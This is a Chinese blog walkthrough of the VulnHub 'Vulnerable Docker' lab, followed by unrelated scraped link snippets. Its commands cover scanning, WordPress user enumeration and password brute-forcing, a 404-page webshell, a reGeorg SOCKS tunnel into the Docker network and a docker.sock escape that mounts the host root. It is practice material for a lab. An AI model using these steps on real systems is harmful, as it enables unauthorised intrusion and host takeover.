代码编织梦想

===========================

个人收获:

1.利用reGeorg+Proxifier进行内网渗透

2.学会wpscan

3.学会了Docker Remote api

 

=============================

 

下载地址:https://download.vulnhub.com/vulnerabledocker/

 

靶机总共有3个FLAG

=====================================================

靶机IP地址:192.168.110.131

Kali:192.168.110.128

 

======================================================

先用netdiscover来进行主机探索或者用nmap

discover -r 192.168.110.0/24

nmap -sn 192.168.110.0/24

 

然后使用nmap来对主机进行详细扫描

 

nmap -A 192.168.110.131

 

 

发现主机打开了8000端口,我们看看

是一个博客

 

我们在最底下发现博客使用wordpress搭建的

 

我们使用wpscan进行漏洞扫描

wpscan --url http://192.168.110.131:8000/

 

打开http://192.168.110.131:8000/robots.txt 看看有什么线索

 

无可用信息

 

使用wpscan进行枚举用户

wpscan --url http://192.168.110.131:8000/ --enumerate u

 

安装正常思维对用户名进行爆破

wpscan --url http://192.168.110.131:8000/ -e u --wordlist /root/1.txt

没有得到任何信息

 

这个时候我们在回头看起robots.txt,打开wp的登陆端

http://192.168.110.131:8000/wp-admin/

 

 

我们使用刚刚爆破出来的用户名bob进行尝试,而在这里的密码需要使用burp进行爆破

 

 

爆破的结果:

 

使用爆破成功的密码进入后台(找到第一个flag)

 

 

接下来我们使用wp的在线编辑功能在404页面写入一句话就可以。

 

*这里我用蚁剑连接老是报错无法连接,后来改用C刀就可以正常连接

 

收集下数据库的配置信息

 

然后我们用模拟终端查看下系统信息

查看下用户信息

这个系统还是比较新的直接可以放弃提权,否则Dirty Cow之类的漏洞还是可以的。不过我们参考下面的一篇文章,找到一点灵感

https://paper.seebug.org/396/

 

 

输入ip addr

想起题目是Vulnerable Docker VM 猜想应该就是docker.sock或者http api未授权访问之类的问题,但是翻了下没找到

 

但是看到机器的IP,感觉这个虚拟机里面应该还有个docker network的内网,简单的ping下,发现至少存在172.18.0.1-4的

这个时候需要坐下内网穿透,方便在我的电脑上操作,否则shell里面缺少很多工具和依赖,比较麻烦。

 

===========接下来的步骤没有成功,用curl提示执行失败,代码手动写到404文件也无法连接=====================

===========直接复制原来文章的步骤=============================================================

我使用的是 reGeorg:https://github.com/sensepost/reGeorg

curl -o tunnel.php 
 
https://raw.githubusercontent.com/sensepost/reGeorg/master/tunnel.nosocket.php

浏览器访问了一下,显示Georg says,'All seems fine'

本地电脑上运行python reGeorgSocksProxy.py -u http://192.168.30.171:8000/tunnel.php

 

[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:8888], tunnel at [http://192.168.30.171:8000/tunnel.php]
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'

因为reGeorg提供的是socks5代理,所以需要本地使用proxychains具体配置不多说了

proxychains mysql -u wordpress -pWordPressISBest -h 172.18.0.4 连接数据库,

但是并没有找到什么 flag,然后继续扫内网,还是nmap那一堆命令加上proxychains前缀就好。

然后发现一个IP有个奇怪的端口

Nmap scan report for 172.18.0.3
Host is up (0.0062s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp   open  ssh
8022/tcp open  oa-system

curl看了下,貌似是一个网页,然后在设置了浏览器的socks5代理,就看到了,原来是一个网页版ssh,而且这里面终于有docker.sock

 

 

接下来就是老套路了,可以参考 :Docker学习与remote API未授权访问分析和利用:https://www.secpulse.com/archives/55928.html

而我是直接在另一个kali中里面安装了一个docker,这样就可以操作主机上的docker了。

 

 

然后使用volume挂载主机上的所有文件到一个目录

docker run -it --rm -v /:/vol wordpress /bin/bash

这样就可以看到flag_3

参考资料:

Vulnerable Docker靶机下载:https://www.vulnhub.com/entry/vulnerable-docker-1,208/

Docker学习与remote API未授权访问分析和利用:https://www.secpulse.com/archives/55928.html

WPScan使用完整教程之记一次对WordPress的渗透过程: https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=46194&page=1#pid511454

Docker学习:https://www.bilibili.com/video/av17854410?from=search&seid=13990341548063716463

Tunnel Manager - From RCE to Docker Escape:https://paper.seebug.org/396/

reGeorg:https://github.com/sensepost/reGeorg

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/82914305

docker练习及在ctfd平台上放题目_0verwatch的博客-爱代码爱编程_怎么在ctfd上放置web题目

前言 这篇文章算是Docker学习还有CTFd平台搭建后的练习吧,毕竟都是用的dockerfile 正文 这里我复现的题目是SUSCTF 2018的题目,下面是github地址 https://github.com/

metasploit 渗透测试手册第三版 第二章 信息收集与扫描(翻译)_weixin_34186950的博客-爱代码爱编程

第二章 信息收集和扫描 在本章中,我们将学习以下内容 使用Metasploit被动收集信息 使用Metasploit主动收集信息 使用Nmap进行端口扫描 使用db_nmap方式进行端口扫描 使用ARP进行主机发现 UDP服务探测 SMB扫描和枚举 SSH版本扫描 FTP扫描 SMTP枚举 SNMP枚举

【htb系列】靶机netmon的渗透测试_大方子的博客-爱代码爱编程

总结和反思: 1. win中执行powershell的远程代码下载执行注意双引号转义 2. 对powershell代码先转为windows上默认的Unicode编码方式(UTF-16LE)再转为 base64执行,防止代码内容被破坏 3. 学会查CVE漏洞 4. 通过命令行把终端内容保存到剪切板中 5. 运维人员密码修改的规律,仅仅修改了密码中的年份,这是

vulhub之docker安装(全步骤)-爱代码爱编程

目录 vulhub介绍安装安装环境安装步骤更新源安装pip安装docker安装docker-compose下载环境部署系统环境docker拉取缓慢解决方法 vulhub介绍 Vulhub是一

docker搭建vulhub靶场-爱代码爱编程

近期自己想本地搭建一个靶场去多多练习漏洞理解漏洞原理,就在找资料docker搭建vulhub靶场。前面走过很多弯路,想在kali上搭建,但一直都搭建不起,就放弃了。kali出现的问题是公钥连接不上服务器(也有可能是自己kali版本的问题2019年的,太懒就没有重新安装),看了很多文章也没解决,就换成了centos7了,参考文章按照步骤来安装成功。 参考链

使用docker搭建vulhub环境-爱代码爱编程

启动docker;docker service images 查看docker的状态:docker service status 先安装docker-compose sudo curl -L https://get.daocloud.io/docker/compose/releases/download/1.25.1/docker-compose-unam

CentOS7搭建Docker + Vulnhub靶场-爱代码爱编程

前言 想要学习好安全知识的话,就需要各种各样的实战。而Vulhub里就有许多已经搭好的靶场,通过Docker容器就可以进行快速的搭建练习。下面我就通过CentOS 7来演示如何搭建Vulhub靶场。 如果你是在其它的Linux系统(如Ubuntu),则将下面的yum命令改成相应的apt(或apt-get)来进行安装。同样也是可以完成安装的。 开始搭建

centos7环境下docker搭建vulhub__changan的博客-爱代码爱编程

文章目录 一、Docker安装1、查看centos内核版本2、安装依赖包3、设置仓库,增加 docker repo4、安装Docker5、启动Docker6、测试一下7、设置国内源8、重启9、安装docker-compose:二、vulhub安装1、下载安装vulhub2、进入指定目录3、开启环境4、查看docker开放端口5、访问 Docker

【甄选靶场】 vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权)_小荣学网安的博客-爱代码爱编程

Vulnhub百个项目渗透 Vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权) 🔥系列专栏:Vulnhub百个项目渗透 🎉欢迎关注

vulhub靶场搭建+docker环境搭建详解(最稳定方式)-爱代码爱编程

安装vulhub靶场,首先到其官网下载,也可以直接拉去,我是下载通过xshell上传的,主要是docker环境很麻烦 这里我建议直接离线安装,在线安装有各种乱七八糟问题,特别是安装docker-compose 访问https

vulnhub靶场——vulnerable docker: 1 easy_vuln是什么docker-爱代码爱编程

准备 靶机: vulnerable_docker_containement NAT 攻击机: kali 下载链接: https://download.vulnhub.com/vulnerabledocker/vulnera